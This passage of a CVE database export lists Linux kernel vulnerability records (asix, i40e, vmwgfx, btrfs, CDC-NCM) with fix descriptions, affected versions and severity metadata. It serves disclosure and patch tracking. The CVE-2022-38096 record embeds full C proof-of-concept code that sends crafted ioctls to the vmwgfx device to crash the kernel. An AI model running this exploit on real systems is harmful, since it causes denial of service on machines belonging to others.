"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16",
"versionStartIncluding": "4.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nasix: fix uninit-value in asix_mdio_read()\n\nasix_read_cmd() may read less than sizeof(smsr) bytes and in this case\nsmsr will be uninitialized.\n\nFail log:\nBUG: KMSAN: uninit-value in asix_check_host_enable drivers/net/usb/asix_common.c:82 [inline]\nBUG: KMSAN: uninit-value in asix_check_host_enable drivers/net/usb/asix_common.c:82 [inline] drivers/net/usb/asix_common.c:497\nBUG: KMSAN: uninit-value in asix_mdio_read+0x3c1/0xb00 drivers/net/usb/asix_common.c:497 drivers/net/usb/asix_common.c:497\n asix_check_host_enable drivers/net/usb/asix_common.c:82 [inline]\n asix_check_host_enable drivers/net/usb/asix_common.c:82 [inline] drivers/net/usb/asix_common.c:497\n asix_mdio_read+0x3c1/0xb00 drivers/net/usb/asix_common.c:497 drivers/net/usb/asix_common.c:497"
}
],
"providerMetadata": {
"dateUpdated": "2026-05-11T13:48:05.020Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d259f621c85949f30cc578cac813b82bb5169f56"
},
{
"url": "https://git.kernel.org/stable/c/8035b1a2a37a29d8c717ef84fca8fe7278bc9f03"
}
],
"title": "asix: fix uninit-value in asix_mdio_read()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2021-47101",
"datePublished": "2024-03-04T18:10:54.117Z",
"dateReserved": "2024-02-29T22:33:44.301Z",
"dateUpdated": "2026-05-11T13:48:05.020Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2021-47501 (GCVE-0-2021-47501)
Vulnerability from cvelistv5 – Published: 2024-05-24 15:01 – Updated: 2026-05-11 13:55
VLAI
EPSS
Title
i40e: Fix NULL pointer dereference in i40e_dbg_dump_desc
Summary
In the Linux kernel, the following vulnerability has been resolved:
i40e: Fix NULL pointer dereference in i40e_dbg_dump_desc
When trying to dump VFs VSI RX/TX descriptors
using debugfs there was a crash
due to NULL pointer dereference in i40e_dbg_dump_desc.
Added a check to i40e_dbg_dump_desc that checks if
VSI type is correct for dumping RX/TX descriptors.
Severity
No CVSS data available.
Assigner
References
Impacted products
2 products
| Vendor | Product | Version | |
|---|---|---|---|
| Linux | Linux |
Affected:
02e9c290814cc143ceccecb14eac3e7a05da745e , < e5b7fb2198abc50058f1a29c395b004f76ab1c83
(git)
Affected: 02e9c290814cc143ceccecb14eac3e7a05da745e , < 16431e442db248ecd8aa9457cf0a656f1885f56e (git) Affected: 02e9c290814cc143ceccecb14eac3e7a05da745e , < 23ec111bf3549aae37140330c31a16abfc172421 (git) |
|
| Linux | Linux |
Affected:
3.12
Unaffected: 0 , < 3.12 (semver) Unaffected: 5.10.85 , ≤ 5.10.* (semver) Unaffected: 5.15.8 , ≤ 5.15.* (semver) Unaffected: 5.16 , ≤ * (original_commit_for_fix) |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2021-47501",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-10T18:53:53.614307Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-10T18:54:04.855Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-04T05:39:59.819Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e5b7fb2198abc50058f1a29c395b004f76ab1c83"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/16431e442db248ecd8aa9457cf0a656f1885f56e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/23ec111bf3549aae37140330c31a16abfc172421"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/intel/i40e/i40e_debugfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e5b7fb2198abc50058f1a29c395b004f76ab1c83",
"status": "affected",
"version": "02e9c290814cc143ceccecb14eac3e7a05da745e",
"versionType": "git"
},
{
"lessThan": "16431e442db248ecd8aa9457cf0a656f1885f56e",
"status": "affected",
"version": "02e9c290814cc143ceccecb14eac3e7a05da745e",
"versionType": "git"
},
{
"lessThan": "23ec111bf3549aae37140330c31a16abfc172421",
"status": "affected",
"version": "02e9c290814cc143ceccecb14eac3e7a05da745e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/intel/i40e/i40e_debugfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.12"
},
{
"lessThan": "3.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.85",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.16",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.85",
"versionStartIncluding": "3.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.8",
"versionStartIncluding": "3.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16",
"versionStartIncluding": "3.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ni40e: Fix NULL pointer dereference in i40e_dbg_dump_desc\n\nWhen trying to dump VFs VSI RX/TX descriptors\nusing debugfs there was a crash\ndue to NULL pointer dereference in i40e_dbg_dump_desc.\nAdded a check to i40e_dbg_dump_desc that checks if\nVSI type is correct for dumping RX/TX descriptors."
}
],
"providerMetadata": {
"dateUpdated": "2026-05-11T13:55:52.335Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e5b7fb2198abc50058f1a29c395b004f76ab1c83"
},
{
"url": "https://git.kernel.org/stable/c/16431e442db248ecd8aa9457cf0a656f1885f56e"
},
{
"url": "https://git.kernel.org/stable/c/23ec111bf3549aae37140330c31a16abfc172421"
}
],
"title": "i40e: Fix NULL pointer dereference in i40e_dbg_dump_desc",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2021-47501",
"datePublished": "2024-05-24T15:01:49.040Z",
"dateReserved": "2024-05-22T06:20:56.204Z",
"dateUpdated": "2026-05-11T13:55:52.335Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2022-38096 (GCVE-0-2022-38096)
Vulnerability from cvelistv5 – Published: 2022-09-09 14:39 – Updated: 2026-05-12 10:12
VLAI
EPSS
Title
There is a NULL pointer vulnerability in vmwgfx driver
Summary
A NULL pointer dereference vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).
Severity
6.3 (Medium)
CWE
- CWE-476 - NULL Pointer Dereference
Assigner
References
2 references
Impacted products
Date Public
2022-09-06 00:00
Credits
Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5.14",
"status": "affected",
"version": "v4.20-rc1",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-38096",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-26T13:45:25.191519Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-26T13:49:29.690Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-03T10:45:52.802Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2073"
},
{
"name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"affected": [
{
"defaultStatus": "unknown",
"product": "SIMATIC S7-1500 TM MFP - GNU/Linux subsystem",
"vendor": "Siemens",
"versions": [
{
"lessThan": "*",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-12T10:12:29.908Z",
"orgId": "0b142b55-0307-4c5a-b3c9-f314f3fb7c5e",
"shortName": "siemens-SADP"
},
"references": [
{
"url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
}
],
"x_adpType": "supplier"
}
],
"cna": {
"affected": [
{
"product": "kernel",
"vendor": "Linux",
"versions": [
{
"lessThan": "5.13.0-52*",
"status": "affected",
"version": "v4.20-rc1",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
}
],
"datePublic": "2022-09-06T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A NULL pointer dereference vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
}
],
"exploits": [
{
"lang": "en",
"value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint fd = 0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n {\n printf(\"open tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n \n}\nvoid poc(int sid){ \nint cmd[0x1000]={0};\ncmd[0]=1165;\ncmd[1]=0x50;\ncmd[2]=0x0;\ncmd[3]=0x0;\ncmd[4]=-1;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=2; \n\targ.context_handle=sid;\n if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n\n}\nint alloc_context(){\n\nint arg[0x10]={0};\narg[0]=0;\narg[1]=0x100;\n\nif (ioctl(fd, 0x80086447, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[0]; \n}\n\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[2]; \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\nreturn arg.flags;\n}\nint main(int ac, char **argv)\n{\ninit();\nint cid=alloc_context(); \n printf(\"%d\",cid); \n poc(cid); \n \n}"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "CWE-476 NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-25T21:08:05.642Z",
"orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
"shortName": "Anolis"
},
"references": [
{
"url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2073"
},
{
"name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"source": {
"defect": [
"https://bugzilla.openanolis.cn/show_bug.cgi?id=2073"
],
"discovery": "INTERNAL"
},
"title": "There is a NULL pointer vulnerability in vmwgfx driver",
"x_generator": {
"engine": "Vulnogram 0.0.9"
}
}
},
"cveMetadata": {
"assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
"assignerShortName": "Anolis",
"cveId": "CVE-2022-38096",
"datePublished": "2022-09-09T14:39:51.163Z",
"dateReserved": "2022-09-07T00:00:00.000Z",
"dateUpdated": "2026-05-12T10:12:29.908Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2022-48733 (GCVE-0-2022-48733)
Vulnerability from cvelistv5 – Published: 2024-06-20 11:13 – Updated: 2026-05-11 18:45
VLAI
EPSS
Title
btrfs: fix use-after-free after failure to create a snapshot
Summary
In the Linux kernel, the following vulnerability has been resolved:
btrfs: fix use-after-free after failure to create a snapshot
At ioctl.c:create_snapshot(), we allocate a pending snapshot structure and
then attach it to the transaction's list of pending snapshots. After that
we call btrfs_commit_transaction(), and if that returns an error we jump
to 'fail' label, where we kfree() the pending snapshot structure. This can
result in a later use-after-free of the pending snapshot:
1) We allocated the pending snapshot and added it to the transaction's
list of pending snapshots;
2) We call btrfs_commit_transaction(), and it fails either at the first
call to btrfs_run_delayed_refs() or btrfs_start_dirty_block_groups().
In both cases, we don't abort the transaction and we release our
transaction handle. We jump to the 'fail' label and free the pending
snapshot structure. We return with the pending snapshot still in the
transaction's list;
3) Another task commits the transaction. This time there's no error at
all, and then during the transaction commit it accesses a pointer
to the pending snapshot structure that the snapshot creation task
has already freed, resulting in a user-after-free.
This issue could actually be detected by smatch, which produced the
following warning:
fs/btrfs/ioctl.c:843 create_snapshot() warn: '&pending_snapshot->list' not removed from list
So fix this by not having the snapshot creation ioctl directly add the
pending snapshot to the transaction's list. Instead add the pending
snapshot to the transaction handle, and then at btrfs_commit_transaction()
we add the snapshot to the list only when we can guarantee that any error
returned after that point will result in a transaction abort, in which
case the ioctl code can safely free the pending snapshot and no one can
access it anymore.
Severity
No CVSS data available.
Assigner
References
Impacted products
2 products
| Vendor | Product | Version | |
|---|---|---|---|
| Linux | Linux |
Affected:
c37b2b6269ee4637fb7cdb5da0d1e47215d57ce2 , < 7e4c72dbaf62f8978af8321a24dbd35566d3a78a
(git)
Affected: c37b2b6269ee4637fb7cdb5da0d1e47215d57ce2 , < a7b717fa15165d3d9245614680bebc48a52ac05d (git) Affected: c37b2b6269ee4637fb7cdb5da0d1e47215d57ce2 , < 9372fa1d73da5f1673921e365d0cd2c27ec7adc2 (git) Affected: c37b2b6269ee4637fb7cdb5da0d1e47215d57ce2 , < 28b21c558a3753171097193b6f6602a94169093a (git) |
|
| Linux | Linux |
Affected:
3.7
Unaffected: 0 , < 3.7 (semver) Unaffected: 5.10.226 , ≤ 5.10.* (semver) Unaffected: 5.15.22 , ≤ 5.15.* (semver) Unaffected: 5.16.8 , ≤ 5.16.* (semver) Unaffected: 5.17 , ≤ * (original_commit_for_fix) |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-03T21:46:47.137Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a7b717fa15165d3d9245614680bebc48a52ac05d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9372fa1d73da5f1673921e365d0cd2c27ec7adc2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/28b21c558a3753171097193b6f6602a94169093a"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48733",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:10:54.149503Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:48.869Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/btrfs/ioctl.c",
"fs/btrfs/transaction.c",
"fs/btrfs/transaction.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "7e4c72dbaf62f8978af8321a24dbd35566d3a78a",
"status": "affected",
"version": "c37b2b6269ee4637fb7cdb5da0d1e47215d57ce2",
"versionType": "git"
},
{
"lessThan": "a7b717fa15165d3d9245614680bebc48a52ac05d",
"status": "affected",
"version": "c37b2b6269ee4637fb7cdb5da0d1e47215d57ce2",
"versionType": "git"
},
{
"lessThan": "9372fa1d73da5f1673921e365d0cd2c27ec7adc2",
"status": "affected",
"version": "c37b2b6269ee4637fb7cdb5da0d1e47215d57ce2",
"versionType": "git"
},
{
"lessThan": "28b21c558a3753171097193b6f6602a94169093a",
"status": "affected",
"version": "c37b2b6269ee4637fb7cdb5da0d1e47215d57ce2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/btrfs/ioctl.c",
"fs/btrfs/transaction.c",
"fs/btrfs/transaction.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.7"
},
{
"lessThan": "3.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.226",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.22",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.226",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.22",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.8",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "3.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix use-after-free after failure to create a snapshot\n\nAt ioctl.c:create_snapshot(), we allocate a pending snapshot structure and\nthen attach it to the transaction\u0027s list of pending snapshots. After that\nwe call btrfs_commit_transaction(), and if that returns an error we jump\nto \u0027fail\u0027 label, where we kfree() the pending snapshot structure. This can\nresult in a later use-after-free of the pending snapshot:\n\n1) We allocated the pending snapshot and added it to the transaction\u0027s\n list of pending snapshots;\n\n2) We call btrfs_commit_transaction(), and it fails either at the first\n call to btrfs_run_delayed_refs() or btrfs_start_dirty_block_groups().\n In both cases, we don\u0027t abort the transaction and we release our\n transaction handle. We jump to the \u0027fail\u0027 label and free the pending\n snapshot structure. We return with the pending snapshot still in the\n transaction\u0027s list;\n\n3) Another task commits the transaction. This time there\u0027s no error at\n all, and then during the transaction commit it accesses a pointer\n to the pending snapshot structure that the snapshot creation task\n has already freed, resulting in a user-after-free.\n\nThis issue could actually be detected by smatch, which produced the\nfollowing warning:\n\n fs/btrfs/ioctl.c:843 create_snapshot() warn: \u0027\u0026pending_snapshot-\u003elist\u0027 not removed from list\n\nSo fix this by not having the snapshot creation ioctl directly add the\npending snapshot to the transaction\u0027s list. Instead add the pending\nsnapshot to the transaction handle, and then at btrfs_commit_transaction()\nwe add the snapshot to the list only when we can guarantee that any error\nreturned after that point will result in a transaction abort, in which\ncase the ioctl code can safely free the pending snapshot and no one can\naccess it anymore."
}
],
"providerMetadata": {
"dateUpdated": "2026-05-11T18:45:54.500Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/7e4c72dbaf62f8978af8321a24dbd35566d3a78a"
},
{
"url": "https://git.kernel.org/stable/c/a7b717fa15165d3d9245614680bebc48a52ac05d"
},
{
"url": "https://git.kernel.org/stable/c/9372fa1d73da5f1673921e365d0cd2c27ec7adc2"
},
{
"url": "https://git.kernel.org/stable/c/28b21c558a3753171097193b6f6602a94169093a"
}
],
"title": "btrfs: fix use-after-free after failure to create a snapshot",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48733",
"datePublished": "2024-06-20T11:13:20.737Z",
"dateReserved": "2024-06-20T11:09:39.053Z",
"dateUpdated": "2026-05-11T18:45:54.500Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2022-48938 (GCVE-0-2022-48938)
Vulnerability from cvelistv5 – Published: 2024-08-22 03:31 – Updated: 2026-05-23 15:21
VLAI
EPSS
Title
CDC-NCM: avoid overflow in sanity checking
Summary
In the Linux kernel, the following vulnerability has been resolved:
CDC-NCM: avoid overflow in sanity checking
A broken device may give an extreme offset like 0xFFF0
and a reasonable length for a fragment. In the sanity
check as formulated now, this will create an integer
overflow, defeating the sanity check. Both offset
and offset + len need to be checked in such a manner
that no overflow can occur.
And those quantities should be unsigned.
Severity
No CVSS data available.
Assigner
References
6 references
Impacted products
2 products
| Vendor | Product | Version | |
|---|---|---|---|
| Linux | Linux |
Affected:
4ca8b8855264cf1439cdab3da7049bd1e3c2a9e6 , < a612395c7631918e0e10ea48b9ce5ab4340f26a6
(git)
Affected: a270ca35a9499b58366d696d3290eaa4697a42db , < 9957fbf34f52a4d8945d1bf39aae400ef9a11246 (git) Affected: 0fa81b304a7973a499f844176ca031109487dd31 , < 69560efa001397ebb8dc1c3e6a3ce00302bb9f7f (git) Affected: 0fa81b304a7973a499f844176ca031109487dd31 , < 49909c9f8458cacb5b241106cba65aba5a6d8f4c (git) Affected: 0fa81b304a7973a499f844176ca031109487dd31 , < 7b737e47b87589031f0d4657f6d7b0b770474925 (git) Affected: 0fa81b304a7973a499f844176ca031109487dd31 , < 8d2b1a1ec9f559d30b724877da4ce592edc41fdc (git) Affected: 8cf7db86a8984ffa3a3388a8df12bc0aa4c79bd7 (git) Affected: 4.19.285 , < 4.19.323 (semver) Affected: 5.4.245 , < 5.4.285 (semver) Affected: 4.14.317 , < 4.15 (semver) |
|
| Linux | Linux |
Affected:
5.7
Unaffected: 0 , < 5.7 (semver) Unaffected: 4.19.323 , ≤ 4.19.* (semver) Unaffected: 5.4.285 , ≤ 5.4.* (semver) Unaffected: 5.10.103 , ≤ 5.10.* (semver) Unaffected: 5.15.26 , ≤ 5.15.* (semver) Unaffected: 5.16.12 , ≤ 5.16.* (semver) Unaffected: 5.17 , ≤ * (original_commit_for_fix) |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48938",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:32:27.711835Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:59.501Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/usb/cdc_ncm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a612395c7631918e0e10ea48b9ce5ab4340f26a6",
"status": "affected",
"version": "4ca8b8855264cf1439cdab3da7049bd1e3c2a9e6",
"versionType": "git"
},
{
"lessThan": "9957fbf34f52a4d8945d1bf39aae400ef9a11246",
"status": "affected",
"version": "a270ca35a9499b58366d696d3290eaa4697a42db",
"versionType": "git"
},
{
"lessThan": "69560efa001397ebb8dc1c3e6a3ce00302bb9f7f",
"status": "affected",
"version": "0fa81b304a7973a499f844176ca031109487dd31",
"versionType": "git"
},
{
"lessThan": "49909c9f8458cacb5b241106cba65aba5a6d8f4c",
"status": "affected",
"version": "0fa81b304a7973a499f844176ca031109487dd31",
"versionType": "git"
},
{
"lessThan": "7b737e47b87589031f0d4657f6d7b0b770474925",
"status": "affected",
"version": "0fa81b304a7973a499f844176ca031109487dd31",
"versionType": "git"
},
{
"lessThan": "8d2b1a1ec9f559d30b724877da4ce592edc41fdc",
"status": "affected",
"version": "0fa81b304a7973a499f844176ca031109487dd31",
"versionType": "git"
},
{
"status": "affected",
"version": "8cf7db86a8984ffa3a3388a8df12bc0aa4c79bd7",
"versionType": "git"
},
{
"lessThan": "4.19.323",
"status": "affected",
"version": "4.19.285",
"versionType": "semver"
},
{
"lessThan": "5.4.285",
"status": "affected",
"version": "5.4.245",
"versionType": "semver"
},
{
"lessThan": "4.15",
"status": "affected",
